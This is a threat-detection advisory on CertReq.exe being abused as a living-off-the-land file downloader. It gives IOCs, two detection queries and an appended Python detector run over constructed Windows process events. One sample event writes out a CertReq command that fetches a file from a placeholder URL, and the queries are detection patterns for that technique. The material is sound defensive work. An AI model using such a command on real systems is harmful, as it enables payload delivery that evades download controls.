Suspicious CertReq Command to Download

    Date: 11/07/2025

    Severity: High

    Summary

    Detects a suspicious CertReq execution that initiates a file download. This activity is commonly associated with attackers attempting to retrieve additional payloads or configuration files. CertReq is a legitimate Windows utility designed to request and obtain certificates from a Certification Authority (CA); however, it can be misused by threat actors as a living-off-the-land (LotL) technique to facilitate malicious downloads.

    Indicators of Compromise (IOC) List

    Image: certreq.exe

    OriginalFileName: CertReq.exe

    CommandLine contains all of: -Post, -config, http

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1:

    (resourcename = "Windows Security" AND eventtype = "4688") AND (processname like "certreq.exe" AND Originalfilename like "CertReq.exe") AND (commandline like "-Post") AND (commandline like "-config") AND (commandline like "http")

    Detection Query 2:

    (technologygroup = "EDR") AND (processname like "certreq.exe" AND Originalfilename like "CertReq.exe") AND (commandline like "-Post") AND (commandline like "-config") AND (commandline like "http")
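    The same matching logic as the two queries above, run over constructed Windows 4688 process-creation events. This is an added example, not code from the advisory, Gurucul or the referenced Sigma rule; it assumes 4688-style field names (NewProcessName, CommandLine) plus an EDR-supplied OriginalFileName, and every URL and path in the sample events is a placeholder.

```python
"""Detect CertReq being used as a downloader: certreq.exe by image and
OriginalFileName, with -Post, -config and http all present in the command line.
Added example; sample events are constructed, not real telemetry."""
from typing import Dict, List

# Constructed sample events shaped like Event ID 4688 plus OriginalFileName.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # benign: normal certificate enrollment against an internal CA
        "EventID": "4688",
        "NewProcessName": r"C:\Windows\System32\certreq.exe",
        "OriginalFileName": "CertReq.exe",
        "CommandLine": r'certreq.exe -submit -config "CA01\Corp-CA" req.req cert.cer',
    },
    {   # suspicious: -Post -config pointed at an http(s) URL, i.e. an outbound fetch
        "EventID": "4688",
        "NewProcessName": r"C:\Windows\System32\certreq.exe",
        "OriginalFileName": "CertReq.exe",
        "CommandLine": r"CertReq -Post -config https://example.invalid/x in.txt out.bin",
    },
    {   # same arguments but a different binary: must not fire this rule
        "EventID": "4688",
        "NewProcessName": r"C:\Windows\System32\curl.exe",
        "OriginalFileName": "curl.exe",
        "CommandLine": "curl.exe -Post -config http://example.invalid",
    },
]

# All three substrings must appear; "http" also covers "https".
REQUIRED_TOKENS = ("-post", "-config", "http")


def is_certreq_download(event: Dict[str, str]) -> bool:
    """Apply the advisory's logic to one event. Matching is case-insensitive,
    as Windows command lines and Sigma 'contains' are, so 'CertReq -POST' is
    caught even though the query text spells it '-Post'."""
    if event.get("EventID") != "4688":
        return False
    image = event.get("NewProcessName", "").lower().split("\\")[-1]
    original = event.get("OriginalFileName", "").lower()
    if image != "certreq.exe" or original != "certreq.exe":
        return False
    cmd = event.get("CommandLine", "").lower()
    return all(token in cmd for token in REQUIRED_TOKENS)


def find_certreq_downloads(events: List[Dict[str, str]]) -> List[str]:
    """Return the command lines of all events that match the rule."""
    return [e["CommandLine"] for e in events if is_certreq_download(e)]


if __name__ == "__main__":
    for cmd in find_certreq_downloads(SAMPLE_EVENTS):
        print("ALERT: CertReq download:", cmd)
```

    Only the second sample event matches; the enrollment against an internal CA has no http token, and the curl event fails the image and OriginalFileName checks.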

    Reference:

    https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_certreq_download.yml

    Tags

    Threat Actor, CertReq, living off the land (LOTL), Sigma
